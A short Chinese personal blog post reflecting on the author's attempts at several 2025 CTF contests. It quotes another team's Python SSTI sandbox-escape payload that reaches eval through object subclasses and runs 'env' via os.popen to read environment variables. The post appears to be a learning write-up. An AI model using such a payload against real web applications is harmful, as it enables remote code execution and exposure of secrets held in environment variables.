d^3ctf/京麒/鸿蒙ctf2025


d^3就是三所电子科技大学的意思,电子科技大学,杭州电子科技大学,西安电子科技大学
中英文一起的比赛
难度很高,对我目前我的水平来说,基本都做不出来的那种
加上期末原因和技术太菜的原因,同时还报名了鸿蒙2025ctf的比赛还有,京东ctf的赛题
京麒ctf的话,可以签到一个题目的,就是那个计算器的赛题

1
''.__class__.__mro__[1].__subclasses__()[80].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("env").read()')

这是ChaMd5战队的paylaod,我当时不知道说要ssti,只看paylaod的话,我是可以做的。(后面还有删掉disable读环境变量)。后面还有的两道题真的很难了
京东这个ctf预赛的时候还有一个heapdump + shiro反序列化?也是没有遇见过的,当时的web题又下架的快,所以没有解决这个问题,希望以后在赛场上还能再遇见这类赛题


文章作者: wuk0Ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 wuk0Ng !
评论
  目录